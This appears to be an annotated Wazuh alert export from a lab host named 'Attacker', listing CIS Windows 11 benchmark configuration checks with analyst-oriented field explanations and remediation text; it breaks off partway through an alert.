rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '8.2.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.16.2'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2521028 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26292 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Enumerate administrator accounts on elevation' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether administrator accounts are displayed when a user attempts to elevate a running application. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Users could see the list of administrator accounts, making it slightly easier for a malicious user who has logged onto a console session to try to crack the passwords of those accounts. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Credential User Interface\Enumerate administrator accounts on elevation. Note: This Group Policy path is provided by the Group Policy template CredUI.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.16.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 8.2.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\CredUI'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the use of security questions for local accounts' is set to 'Enabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the use of security questions for local accounts' is set to 'Enabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the use of security questions for local accounts' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 15 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.16.3'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2524241 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26293 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Prevent the use of security questions for local accounts' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether security questions can be used to reset local account passwords. The security question feature does not apply to domain accounts, only local accounts on the workstation. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Users could establish security questions that are easily guessed or sleuthed by observing the user’s social media accounts, making it easier for a malicious actor to change the local user account password and gain access to the computer as that user account. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Credential User Interface\Prevent the use of security questions for local accounts. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CredUI.admx/adml that is included with the Microsoft Windows 10 Release 1903 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.16.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Diagnostic Data' is set to 'Enabled: Diagnostic data off (not recommended)' or 'Enabled: Send required diagnostic data'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Diagnostic Data' is set to 'Enabled: Diagnostic data off (not recommended)' or 'Enabled: Send required diagnostic data'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Diagnostic Data' is set to 'Enabled: Diagnostic data off (not recommended)' or 'Enabled: Send required diagnostic data'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 16 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '4.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'SC.8'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2527712 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26294 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Allow Diagnostic Data' is set to 'Enabled: Diagnostic data off (not recommended)' or 'Enabled: Send required diagnostic data'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines the amount of diagnostic and usage data reported to Microsoft: - A value of (0) Diagnostic data off (not recommended). Using this value, no diagnostic data is sent from the device. This value is only supported on Enterprise, Education, and Server editions. If you choose this setting, devices in your organization will still be secure. - A value of (1) Send required diagnostic data. This is the minimum diagnostic data necessary to keep Windows secure, up to date, and performing as expected. Using this value disables the Optional diagnostic data control in the Settings app. - A value of (3)Send optional diagnostic data. Additional diagnostic data is collected that helps us to detect, diagnose and fix issues, as well as make product improvements. Required diagnostic data will always be included when you choose to send optional diagnostic data. Optional diagnostic data can also include diagnostic log files and crash dumps. Use the Limit Dump Collection and the Limit Diagnostic Log Collection policies for more granular control of what optional diagnostic data is sent. Windows telemetry settings apply to the Windows operating system and some first party apps. This setting does not apply to third party apps running on Windows 10/11. The recommended state for this setting is: Enabled: Diagnostic data off (not recommended) or Enabled: Send required diagnostic data. Note: If your organization relies on Windows Update, the minimum recommended setting is Required diagnostic data. Because no Windows Update information is collected when diagnostic data is off, important information about update failures is not sent. Microsoft uses this information to fix the causes of those failures and improve the quality of updates. Note #2: The Configure diagnostic data opt-in settings user interface group policy can be used to prevent end users from changing their data collection settings. Note #3: Enhanced diagnostic data setting is not available on Windows 11 and Windows Server 2022 and has been replaced with policies that can control the amount of optional diagnostic data that is sent. For more information on these settings visit Manage diagnostic data using Group Policy and MDM Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Sending any data to a 3rd party vendor is a security concern and should only be done on an as needed basis. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Diagnostic data off (not recommended) or Enabled: Send required diagnostic data: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Allow Diagnostic Data. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 11 Release 21H2 Administrative Templates (or newer). Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Allow Telemetry, but it was renamed to Allow Diagnostic Data starting with the Windows 11 Release 21H2 Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.17.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 4.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: SC.8 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.7,CC7.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service' is set to 'Enabled: Disable Authenticated Proxy usage'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service' is set to 'Enabled: Disable Authenticated Proxy usage'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service' is set to 'Enabled: Disable Authenticated Proxy usage'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 17 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '4.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'SC.8'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2535875 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26295 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service' is set to 'Enabled: Disable Authenticated Proxy usage'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether the Connected User Experience and Telemetry service can automatically use an authenticated proxy to send data back to Microsoft. The recommended state for this setting is: Enabled: Disable Authenticated Proxy usage. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Sending any data to a 3rd party vendor is a security concern and should only be done on an as needed basis. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Disable Authenticated Proxy usage: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 10 Release 1703 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.17.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 4.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: SC.8 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.7,CC7.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Disable OneSettings Downloads' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 18 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.17.3'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2539776 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26296 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Disable OneSettings Downloads' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether Windows attempts to connect with the OneSettings service to download configuration settings. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Sending data to a 3rd party vendor is a security concern and should only be done on an as-needed basis. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Disable OneSettings Downloads. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.17.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not show feedback notifications' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 19 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '4.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'SC.8'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2542714 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26297 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Do not show feedback notifications' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows an organization to prevent its devices from showing feedback questions from Microsoft. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Users should not be sending any feedback to 3rd party vendors in an enterprise managed environment. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Do not show feedback notifications. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template FeedbackNotifications.admx/adml that is included with the Microsoft Windows 10 Release 1511 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.17.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 4.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: SC.8 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.7,CC7.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enable OneSettings Auditing' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 20 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.17.5'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2545987 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26298 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Enable OneSettings Auditing' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether Windows records attempts to connect with the OneSettings service to the Operational EventLog. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Enable OneSettings Auditing. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.17.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Limit Diagnostic Log Collection' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 21 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.17.6'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2549073 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26299 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Limit Diagnostic Log Collection' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether additional diagnostic logs are collected when more information is needed to troubleshoot a problem on the device. The recommended state for this setting is: Enabled. Note: Diagnostic logs are only sent when the device has been configured to send optional diagnostic data. Diagnostic data is limited with recommendation Allow Diagnostic Data is set to Enabled: Diagnostic data off (not recommended) or Enabled: Send required diagnostic data to send only basic information. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Sending data to a 3rd-party vendor is a security concern and should only be done on an as-needed basis. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Limit Diagnostic Log Collection. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.17.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Toggle user control over Insider builds' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 22 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '4.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'SC.8'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2552677 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26301 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Toggle user control over Insider builds' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
